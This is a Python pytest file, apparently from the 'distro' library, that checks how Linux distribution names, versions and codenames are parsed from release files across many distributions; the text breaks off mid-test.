assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
assert self.distro.major_version() == outcome.get("major_version", "")
assert self.distro.minor_version() == outcome.get("minor_version", "")
assert self.distro.build_number() == outcome.get("build_number", "")
def test_empty_release(self) -> None:
distro_release = os.path.join(SPECIAL, "empty-release")
self.distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file="path-to-non-existing-file",
distro_release_file=distro_release,
)
desired_outcome = {"id": "empty"}
self._test_outcome(desired_outcome)
def test_dontincludeuname(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "dontincludeuname"))
self.distro = distro.LinuxDistribution(include_uname=False)
assert self.distro.uname_attr("id") == ""
assert self.distro.uname_attr("name") == ""
assert self.distro.uname_attr("release") == ""
def test_unknowndistro_release(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "unknowndistro"))
self.distro = distro.LinuxDistribution()
desired_outcome = {
"id": "unknowndistro",
"name": "Unknown Distro",
"pretty_name": "Unknown Distro 1.0 (Unknown Codename)",
"version": "1.0",
"pretty_version": "1.0 (Unknown Codename)",
"best_version": "1.0",
"codename": "Unknown Codename",
"major_version": "1",
"minor_version": "0",
}
self._test_outcome(desired_outcome)
def test_bad_uname(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "baduname"))
self.distro = distro.LinuxDistribution()
assert self.distro.uname_attr("id") == ""
assert self.distro.uname_attr("name") == ""
assert self.distro.uname_attr("release") == ""
def test_empty_uname(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "emptyuname"))
self.distro = distro.LinuxDistribution()
assert self.distro.uname_attr("id") == ""
assert self.distro.uname_attr("name") == ""
assert self.distro.uname_attr("release") == ""
def test_usrlibosreleaseonly(self) -> None:
self._setup_for_distro(
os.path.join(TESTDISTROS, "distro", "usrlibosreleaseonly")
)
self.distro = distro.LinuxDistribution()
desired_outcome = {
"id": "usrlibosreleaseonly",
"name": "usr_lib_os-release_only",
"pretty_name": "/usr/lib/os-release only",
}
self._test_outcome(desired_outcome)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestDistroRelease:
def _test_outcome(
self,
outcome: Dict[str, str],
distro_name: str = "",
version: str = "",
release_file_id: str = "",
release_file_suffix: str = "release",
) -> None:
release_file_id = release_file_id or distro_name
distro_release = os.path.join(
DISTROS_DIR,
distro_name + version,
"etc",
f"{release_file_id}-{release_file_suffix}",
)
self.distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file="path-to-non-existing-file",
distro_release_file=distro_release,
)
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
assert self.distro.major_version() == outcome.get("major_version", "")
assert self.distro.minor_version() == outcome.get("minor_version", "")
assert self.distro.build_number() == outcome.get("build_number", "")
def test_arch_dist_release(self) -> None:
desired_outcome = {"id": "arch"}
self._test_outcome(desired_outcome, "arch")
def test_centos5_dist_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS",
"pretty_name": "CentOS 5.11 (Final)",
"version": "5.11",
"pretty_version": "5.11 (Final)",
"best_version": "5.11",
"codename": "Final",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome, "centos", "5")
def test_centos7_dist_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS Linux",
"pretty_name": "CentOS Linux 7.1.1503 (Core)",
"version": "7.1.1503",
"pretty_version": "7.1.1503 (Core)",
"best_version": "7.1.1503",
"codename": "Core",
"major_version": "7",
"minor_version": "1",
"build_number": "1503",
}
self._test_outcome(desired_outcome, "centos", "7")
def test_fedora19_dist_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 19 (Schrödinger’s Cat)",
"version": "19",
"pretty_version": "19 (Schrödinger’s Cat)",
"best_version": "19",
"codename": "Schrödinger’s Cat",
"major_version": "19",
}
self._test_outcome(desired_outcome, "fedora", "19")
def test_fedora23_dist_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 23 (Twenty Three)",
"version": "23",
"pretty_version": "23 (Twenty Three)",
"best_version": "23",
"codename": "Twenty Three",
"major_version": "23",
}
self._test_outcome(desired_outcome, "fedora", "23")
def test_fedora30_dist_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 30 (Thirty)",
"version": "30",
"pretty_version": "30 (Thirty)",
"best_version": "30",
"codename": "Thirty",
"major_version": "30",
}
self._test_outcome(desired_outcome, "fedora", "30")
def test_gentoo_dist_release(self) -> None:
desired_outcome = {
"id": "gentoo",
"name": "Gentoo Base System",
"pretty_name": "Gentoo Base System 2.2",
"version": "2.2",
"pretty_version": "2.2",
"best_version": "2.2",
"major_version": "2",
"minor_version": "2",
}
self._test_outcome(desired_outcome, "gentoo")
def test_kvmibm1_dist_release(self) -> None:
desired_outcome = {
"id": "base",
"name": "KVM for IBM z Systems",
"pretty_name": "KVM for IBM z Systems 1.1.1 (Z)",
"version": "1.1.1",
"pretty_version": "1.1.1 (Z)",
"best_version": "1.1.1",
"codename": "Z",
"major_version": "1",
"minor_version": "1",
"build_number": "1",
}
self._test_outcome(desired_outcome, "kvmibm", "1", "base")
def test_mageia5_dist_release(self) -> None:
desired_outcome = {
"id": "mageia",
"name": "Mageia",
"pretty_name": "Mageia 5 (Official)",
"version": "5",
"pretty_version": "5 (Official)",
"best_version": "5",
"codename": "Official",
"major_version": "5",
}
self._test_outcome(desired_outcome, "mageia", "5")
def test_manjaro1512_dist_release(self) -> None:
self._test_outcome(
{
"id": "manjaro",
"name": "Manjaro Linux",
"pretty_name": "Manjaro Linux",
"version": "",
"codename": "",
},
"manjaro",
"1512",
)
def test_opensuse42_dist_release(self) -> None:
desired_outcome = {
"id": "suse",
"name": "openSUSE",
"pretty_name": "openSUSE 42.1 (x86_64)",
"version": "42.1",
"pretty_version": "42.1 (x86_64)",
"best_version": "42.1",
"codename": "x86_64",
"major_version": "42",
"minor_version": "1",
}
self._test_outcome(desired_outcome, "opensuse", "42", "SuSE")
def test_oracle7_dist_release(self) -> None:
desired_outcome = {
"id": "oracle",
"name": "Oracle Linux Server",
"pretty_name": "Oracle Linux Server 7.5",
"version": "7.5",
"pretty_version": "7.5",
"best_version": "7.5",
"major_version": "7",
"minor_version": "5",
}
self._test_outcome(desired_outcome, "oracle", "7")
def test_rhel6_dist_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 6.5 (Santiago)",
"version": "6.5",
"pretty_version": "6.5 (Santiago)",
"best_version": "6.5",
"codename": "Santiago",
"major_version": "6",
"minor_version": "5",
}
self._test_outcome(desired_outcome, "rhel", "6", "redhat")
def test_rhel7_dist_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 7.0 (Maipo)",
"version": "7.0",
"pretty_version": "7.0 (Maipo)",
"best_version": "7.0",
"codename": "Maipo",
"major_version": "7",
"minor_version": "0",
}
self._test_outcome(desired_outcome, "rhel", "7", "redhat")
def test_slackware14_dist_release(self) -> None:
desired_outcome = {
"id": "slackware",
"name": "Slackware",
"pretty_name": "Slackware 14.1",
"version": "14.1",
"pretty_version": "14.1",
"best_version": "14.1",
"major_version": "14",
"minor_version": "1",
}
self._test_outcome(
desired_outcome, "slackware", "14", release_file_suffix="version"
)
def test_sles12_dist_release(self) -> None:
desired_outcome = {
"id": "suse",
"name": "SUSE Linux Enterprise Server",
"pretty_name": "SUSE Linux Enterprise Server 12 (s390x)",
"version": "12",
"pretty_version": "12 (s390x)",
"best_version": "12",
"major_version": "12",
"codename": "s390x",
}
self._test_outcome(desired_outcome, "sles", "12", "SuSE")
def test_cloudlinux5_dist_release(self) -> None:
# Uses redhat-release only to get information.
# The id of 'rhel' can only be fixed with issue #109.
desired_outcome = {
"id": "cloudlinux",
"codename": "Vladislav Volkov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 5.11 (Vladislav Volkov)",
"version": "5.11",
"pretty_version": "5.11 (Vladislav Volkov)",
"best_version": "5.11",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome, "cloudlinux", "5", "redhat")
def test_cloudlinux6_dist_release(self) -> None:
# Same as above, only has redhat-release.
desired_outcome = {
"id": "cloudlinux",
"codename": "Oleg Makarov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 6.8 (Oleg Makarov)",
"version": "6.8",
"pretty_version": "6.8 (Oleg Makarov)",
"best_version": "6.8",
"major_version": "6",
"minor_version": "8",
}
self._test_outcome(desired_outcome, "cloudlinux", "6", "redhat")
def test_cloudlinux7_dist_release(self) -> None:
desired_outcome = {
"id": "cloudlinux",
"codename": "Yury Malyshev",
"name": "CloudLinux",
"pretty_name": "CloudLinux 7.3 (Yury Malyshev)",
"version": "7.3",
"pretty_version": "7.3 (Yury Malyshev)",
"best_version": "7.3",
"major_version": "7",
"minor_version": "3",
}
self._test_outcome(desired_outcome, "cloudlinux", "7", "redhat")
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOverall(DistroTestCase):
"""Test a LinuxDistribution object created with default arguments.
The direct accessor functions on that object are tested (e.g. `id()`); they
implement the precedence between the different sources of information.
In addition, because the distro release file is searched when not
specified, the information resulting from the distro release file is also
tested. The LSB and os-release sources are not tested again, because their
test is already done in TestLSBRelease and TestOSRelease, and their
algorithm does not depend on whether or not the file is specified.
TODO: This class should have testcases for all distros that are claimed
to be reliably maintained w.r.t. to their ID (see `id()`). Testcases for
the following distros are still missing:
* `gentoo` - GenToo Linux
* `ibm_powerkvm` - IBM PowerKVM
* `parallels` - Parallels
* `pidora` - Pidora (Fedora remix for Raspberry Pi)
* `raspbian` - Raspbian
* `scientific` - Scientific Linux
* `xenserver` - XenServer
"""
def setup_method(self, test_method: FunctionType) -> None:
super().setup_method(test_method)
dist = test_method.__name__.split("_")[1]
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
self.distro = distro.LinuxDistribution()
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
assert self.distro.major_version() == outcome.get("major_version", "")
assert self.distro.minor_version() == outcome.get("minor_version", "")
assert self.distro.build_number() == outcome.get("build_number", "")
def _test_non_existing_release_file(self) -> None:
# Test the info from the searched distro release file
# does not have one.
assert self.distro.distro_release_file == ""
assert len(self.distro.distro_release_info()) == 0
def _test_release_file_info(
self, filename: str, outcome: Dict[str, str]
) -> Dict[str, str]:
# Test the info from the searched distro release file
assert os.path.basename(self.distro.distro_release_file) == filename
distro_info = self.distro.distro_release_info()
for key, value in outcome.items():
assert distro_info[key] == value
return distro_info
def test_arch_release(self) -> None:
desired_outcome = {
"id": "arch",
"name": "Arch Linux",
"pretty_name": "Arch Linux",
}
self._test_outcome(desired_outcome)
# Test the info from the searched distro release file
# Does not have one; The empty /etc/arch-release file is not
# considered a valid distro release file:
self._test_non_existing_release_file()
def test_aix72_release(self) -> None:
desired_outcome = {
"id": "aix",
"name": "AIX",
"pretty_name": "AIX 7.2.0.0",
"version": "7.2.0.0",
"pretty_version": "7.2.0.0",
"best_version": "7.2.0.0",
"major_version": "7",
"minor_version": "2",
"build_number": "0",
}
self._test_outcome(desired_outcome)
def test_centos5_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS",
"pretty_name": "CentOS 5.11 (Final)",
"version": "5.11",
"pretty_version": "5.11 (Final)",
"best_version": "5.11",
"codename": "Final",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "centos",
"name": "CentOS",
"version_id": "5.11",
"codename": "Final",
}
self._test_release_file_info("centos-release", desired_info)
def test_centos7_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS Linux",
"pretty_name": "CentOS Linux 7 (Core)",
"version": "7",
"pretty_version": "7 (Core)",
"best_version": "7.1.1503",
"like": "rhel fedora",
"codename": "Core",
"major_version": "7",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "centos",
"name": "CentOS Linux",
"version_id": "7.1.1503",
"codename": "Core",
}
self._test_release_file_info("centos-release", desired_info)
def test_coreos_release(self) -> None:
desired_outcome = {
"id": "coreos",
"name": "CoreOS",
"pretty_name": "CoreOS 899.15.0",
"version": "899.15.0",
"pretty_version": "899.15.0",
"best_version": "899.15.0",
"major_version": "899",
"minor_version": "15",
"build_number": "0",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_debian8_release(self) -> None:
desired_outcome = {
"id": "debian",
"name": "Debian GNU/Linux",
"pretty_name": "Debian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8.2",
"codename": "jessie",
"major_version": "8",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_exherbo_release(self) -> None:
desired_outcome = {
"id": "exherbo",
"name": "Exherbo",
"pretty_name": "Exherbo Linux",
}
self._test_outcome(desired_outcome)
def test_fedora19_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 19 (Schrödinger’s Cat)",
"version": "19",
"pretty_version": "19 (Schrödinger’s Cat)",
"best_version": "19",
"codename": "Schrödinger’s Cat",
"major_version": "19",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "fedora",
"name": "Fedora",
"version_id": "19",
"codename": "Schrödinger’s Cat",
}
self._test_release_file_info("fedora-release", desired_info)
def test_fedora23_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 23 (Twenty Three)",
"version": "23",
"pretty_version": "23 (Twenty Three)",
"best_version": "23",
"codename": "Twenty Three",
"major_version": "23",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "fedora",
"name": "Fedora",
"version_id": "23",
"codename": "Twenty Three",
}
self._test_release_file_info("fedora-release", desired_info)
def test_fedora30_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 30 (Thirty)",
"version": "30",
"pretty_version": "30",
"best_version": "30",
"codename": "",
"major_version": "30",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "fedora",
"name": "Fedora",
"version_id": "30",
"codename": "Thirty",
}
self._test_release_file_info("fedora-release", desired_info)
def test_kvmibm1_release(self) -> None:
desired_outcome = {
"id": "kvmibm",
"name": "KVM for IBM z Systems",
"pretty_name": "KVM for IBM z Systems 1.1.1 (Z)",
"version": "1.1.1",
"pretty_version": "1.1.1 (Z)",
"best_version": "1.1.1",
"like": "rhel fedora",
"codename": "Z",
"major_version": "1",
"minor_version": "1",
"build_number": "1",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "base",
"name": "KVM for IBM z Systems",
"version_id": "1.1.1",
"codename": "Z",
}
self._test_release_file_info("base-release", desired_info)
def test_linuxmint17_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
"major_version": "14",
"minor_version": "04",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_mageia5_release(self) -> None:
desired_outcome = {
"id": "mageia",
"name": "Mageia",
"pretty_name": "Mageia 5",
"version": "5",
"pretty_version": "5 (thornicroft)",
"best_version": "5",
"like": "mandriva fedora",
# TODO: Codename differs between distro release and lsb_release.
"codename": "thornicroft",
"major_version": "5",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "mageia",
"name": "Mageia",
"version_id": "5",
"codename": "Official",
}
self._test_release_file_info("mageia-release", desired_info)
def test_manjaro1512_release(self) -> None:
self._test_outcome(
{
"id": "manjaro",
"name": "Manjaro Linux",
"pretty_name": "Manjaro Linux",
"version": "15.12",
"pretty_version": "15.12 (Capella)",
"best_version": "15.12",
"major_version": "15",
"minor_version": "12",
"codename": "Capella",
}
)
self._test_release_file_info(
"manjaro-release", {"id": "manjaro", "name": "Manjaro Linux"}
)
def test_opensuse42_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 42.1 (x86_64)",
"version": "42.1",
"pretty_version": "42.1 (x86_64)",
"best_version": "42.1",
"like": "suse",
"codename": "x86_64",
"major_version": "42",
"minor_version": "1",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "SuSE",
"name": "openSUSE",
"version_id": "42.1",
"codename": "x86_64",
}
self._test_release_file_info("SuSE-release", desired_info)
def test_opensuse15_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 15.2",
"version": "15.2",
"pretty_version": "15.2",
"best_version": "15.2",
"like": "suse opensuse",
"major_version": "15",
"minor_version": "2",
}
self._test_outcome(desired_outcome)
def test_oracle7_release(self) -> None:
desired_outcome = {
"id": "oracle",
"name": "Oracle Linux Server",
"pretty_name": "Oracle Linux Server 7.5",
"version": "7.5",
"pretty_version": "7.5",
"best_version": "7.5",
"major_version": "7",
"minor_version": "5",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "oracle",
"name": "Oracle Linux Server",
"version_id": "7.5",
}
distro_info = self._test_release_file_info("oracle-release", desired_info)
assert "codename" not in distro_info
def test_raspbian7_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 7 (wheezy)",
"version": "7",
"pretty_version": "7 (wheezy)",
"best_version": "7",
"like": "debian",
"codename": "wheezy",
"major_version": "7",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_raspbian8_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8",
"like": "debian",
"codename": "jessie",
"major_version": "8",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_rhel5_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 5.11 (Tikanga)",
"version": "5.11",
"pretty_version": "5.11 (Tikanga)",
"best_version": "5.11",
"codename": "Tikanga",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Red Hat Enterprise Linux Server",
"version_id": "5.11",
"codename": "Tikanga",
}
self._test_release_file_info("redhat-release", desired_info)
def test_rhel6_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 6.5 (Santiago)",
"version": "6.5",
"pretty_version": "6.5 (Santiago)",
"best_version": "6.5",
"codename": "Santiago",
"major_version": "6",
"minor_version": "5",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Red Hat Enterprise Linux Server",
"version_id": "6.5",
"codename": "Santiago",
}
self._test_release_file_info("redhat-release", desired_info)
def test_rhel7_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 7.0 (Maipo)",
"version": "7.0",
"pretty_version": "7.0 (Maipo)",
"best_version": "7.0",
"like": "fedora",
"codename": "Maipo",
"major_version": "7",
"minor_version": "0",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Red Hat Enterprise Linux Server",
"version_id": "7.0",
"codename": "Maipo",
}
self._test_release_file_info("redhat-release", desired_info)
def test_rocky_release(self) -> None:
desired_outcome = {
"id": "rocky",
"name": "Rocky Linux",
"pretty_name": "Rocky Linux 8.4 (Green Obsidian)",
"version": "8.4",
"pretty_version": "8.4 (Green Obsidian)",
"best_version": "8.4",
"like": "rhel centos fedora",
"codename": "Green Obsidian",
"major_version": "8",
"minor_version": "4",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "centos",
"name": "Rocky Linux",
"version_id": "8.4",
"codename": "Green Obsidian",
}
self._test_release_file_info("centos-release", desired_info)
def test_slackware14_release(self) -> None:
desired_outcome = {
"id": "slackware",
"name": "Slackware",
"pretty_name": "Slackware 14.1",
"version": "14.1",
"pretty_version": "14.1",
"best_version": "14.1",
"major_version": "14",
"minor_version": "1",
}
self._test_outcome(desired_outcome)
desired_info = {"id": "slackware", "name": "Slackware", "version_id": "14.1"}
distro_info = self._test_release_file_info("slackware-version", desired_info)
assert "codename" not in distro_info
def test_sles12_release(self) -> None:
desired_outcome = {
"id": "sles",
"name": "SLES",
"pretty_name": "SUSE Linux Enterprise Server 12 SP1",
"version": "12.1",
"pretty_version": "12.1 (n/a)",
"best_version": "12.1",
"codename": "n/a",
"major_version": "12",
"minor_version": "1",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "SuSE",
"name": "SUSE Linux Enterprise Server",
"version_id": "12",
"codename": "s390x",
}
self._test_release_file_info("SuSE-release", desired_info)
def test_ubuntu14_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
"major_version": "14",
"minor_version": "04",
}
self._test_outcome(desired_outcome)
# Test the info from the searched distro release file
# Does not have one; /etc/debian_version is not considered a distro
# release file:
self._test_non_existing_release_file()
def test_ubuntu16_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 16.04.1 LTS",
"version": "16.04",
"pretty_version": "16.04 (xenial)",
"best_version": "16.04.1",
"like": "debian",
"codename": "xenial",
"major_version": "16",
"minor_version": "04",
}
self._test_outcome(desired_outcome)
# Test the info from the searched distro release file
# Does not have one; /etc/debian_version is not considered a distro
# release file:
self._test_non_existing_release_file()
def test_amazon2016_release(self) -> None:
desired_outcome = {
"id": "amzn",
"name": "Amazon Linux AMI",
"pretty_name": "Amazon Linux AMI 2016.03",
"version": "2016.03",
"pretty_version": "2016.03",
"best_version": "2016.03",
"like": "rhel fedora",
"major_version": "2016",
"minor_version": "03",
}
self._test_outcome(desired_outcome)
def test_amazon2014_release(self) -> None:
# Amazon Linux 2014 only contains a system-release file.
# distro doesn't currently handle it.
self._test_outcome({})
def test_scientific6_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Scientific Linux",
"pretty_name": "Scientific Linux 6.4 (Carbon)",
"version": "6.4",
"pretty_version": "6.4 (Carbon)",
"best_version": "6.4",
"codename": "Carbon",
"major_version": "6",
"minor_version": "4",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Scientific Linux",
"version_id": "6.4",
"codename": "Carbon",
}
self._test_release_file_info("redhat-release", desired_info)
def test_scientific7_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Scientific Linux",
"pretty_name": "Scientific Linux 7.2 (Nitrogen)",
"version": "7.2",
"pretty_version": "7.2 (Nitrogen)",
"best_version": "7.2",
"like": "fedora",
"codename": "Nitrogen",
"major_version": "7",
"minor_version": "2",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Scientific Linux",
"version_id": "7.2",
"codename": "Nitrogen",
}
self._test_release_file_info("redhat-release", desired_info)
def test_gentoo_release(self) -> None:
desired_outcome = {
"id": "gentoo",
"name": "Gentoo",
"pretty_name": "Gentoo/Linux",
"version": "2.2",
"pretty_version": "2.2",
"best_version": "2.2",
"major_version": "2",
"minor_version": "2",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "gentoo",
"name": "Gentoo Base System",
"version_id": "2.2",
}
self._test_release_file_info("gentoo-release", desired_info)
def test_openelec6_release(self) -> None:
desired_outcome = {
"id": "openelec",
"name": "OpenELEC",
"pretty_name": "OpenELEC (official) - Version: 6.0.3",
"version": "6.0",
"pretty_version": "6.0",
"best_version": "6.0.3",
"major_version": "6",
"minor_version": "0",
}
self._test_outcome(desired_outcome)
def test_mandriva2011_release(self) -> None:
desired_outcome = {
"id": "mandrivalinux",
"name": "MandrivaLinux",
"pretty_name": "Mandriva Linux 2011.0",
"version": "2011.0",
"pretty_version": "2011.0 (turtle)",
"best_version": "2011.0",
"major_version": "2011",
"minor_version": "0",
"codename": "turtle",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "mandrake",
"name": "Mandriva Linux",
"version_id": "2011.0",
}
self._test_release_file_info("mandrake-release", desired_info)
def test_cloudlinux5_release(self) -> None:
# Uses redhat-release only to get information.
# The id of 'rhel' can only be fixed with issue #109.
desired_outcome = {
"id": "cloudlinux",
"codename": "Vladislav Volkov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 5.11 (Vladislav Volkov)",
"version": "5.11",
"pretty_version": "5.11 (Vladislav Volkov)",
"best_version": "5.11",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome)
def test_cloudlinux6_release(self) -> None:
# Same as above, only has redhat-release.
desired_outcome = {
"id": "cloudlinux",
"codename": "Oleg Makarov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 6.8 (Oleg Makarov)",
"version": "6.8",
"pretty_version": "6.8 (Oleg Makarov)",
"best_version": "6.8",
"major_version": "6",
"minor_version": "8",
}
self._test_outcome(desired_outcome)
def test_cloudlinux7_release(self) -> None:
desired_outcome = {
"id": "cloudlinux",
"codename": "Yury Malyshev",
"name": "CloudLinux",
"pretty_name": "CloudLinux 7.3 (Yury Malyshev)",
"like": "rhel fedora centos",
"version": "7.3",
"pretty_version": "7.3 (Yury Malyshev)",
"best_version": "7.3",
"major_version": "7",
"minor_version": "3",
}
self._test_outcome(desired_outcome)
def _bad_os_listdir(path: str = ".") -> NoReturn:
"""This function is used by TestOverallWithEtcNotReadable to simulate
a folder that cannot be called with os.listdir() but files are still
readable. Forces distro to guess which *-release files are available."""
raise OSError()
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOverallWithEtcNotReadable(TestOverall):
def setup_method(self, test_method: FunctionType) -> None:
self._old_listdir = os.listdir
# Incompatible types in assignment (expression has type
# "Callable[[str], NoReturn]", variable has type overloaded function)
os.listdir = _bad_os_listdir # type: ignore[assignment]
super().setup_method(test_method)
def teardown_method(self, test_method: FunctionType) -> None:
super().teardown_method(test_method)
if os.listdir is _bad_os_listdir:
os.listdir = self._old_listdir
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestGetAttr(DistroTestCase):
"""Test the consistency between the results of
`{source}_release_attr()` and `{source}_release_info()` for all
distros in `DISTROS`.
"""
def _test_attr(self, info_method: str, attr_method: str) -> None:
for dist in DISTROS:
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
_distro = distro.LinuxDistribution()
info = getattr(_distro, info_method)()
for key in info.keys():
try:
assert info[key] == getattr(_distro, attr_method)(key)
except AssertionError:
print(f"distro: {dist}, key: {key}")
def test_os_release_attr(self) -> None:
self._test_attr("os_release_info", "os_release_attr")
def test_lsb_release_attr(self) -> None:
self._test_attr("lsb_release_info", "lsb_release_attr")
def test_distro_release_attr(self) -> None:
self._test_attr("distro_release_info", "distro_release_attr")
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestInfo(DistroTestCase):
def setup_method(self, test_method: FunctionType) -> None:
super().setup_method(test_method)
self.ubuntu14_os_release = os.path.join(
DISTROS_DIR, "ubuntu14", "etc", "os-release"
)
self.fedora30_os_release = os.path.join(
DISTROS_DIR, "fedora30", "etc", "os-release"
)
def test_info(self) -> None:
_distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file=self.ubuntu14_os_release,
distro_release_file="path-to-non-existing-file",
)
desired_info = {
"id": "ubuntu",
"version": "14.04",
"like": "debian",
"version_parts": {"major": "14", "minor": "04", "build_number": ""},
"codename": "Trusty Tahr",
}
info = _distro.info()
assert info == desired_info
desired_info_diff: Dict[str, Any] = {"version": "14.04 (Trusty Tahr)"}
desired_info.update(desired_info_diff)
info = _distro.info(pretty=True)
assert info == desired_info
desired_info_diff = {
"version": "14.04.3",
"version_parts": {"major": "14", "minor": "04", "build_number": "3"},
}
desired_info.update(desired_info_diff)
info = _distro.info(best=True)
assert info == desired_info
desired_info_diff = {"version": "14.04.3 (Trusty Tahr)"}
desired_info.update(desired_info_diff)
info = _distro.info(pretty=True, best=True)
assert info == desired_info
def test_none(self) -> None:
def _test_none(info: distro.InfoDict) -> None:
assert info["id"] == ""
assert info["version"] == ""
assert info["like"] == ""
assert info["version_parts"]["major"] == ""
assert info["version_parts"]["minor"] == ""
assert info["version_parts"]["build_number"] == ""
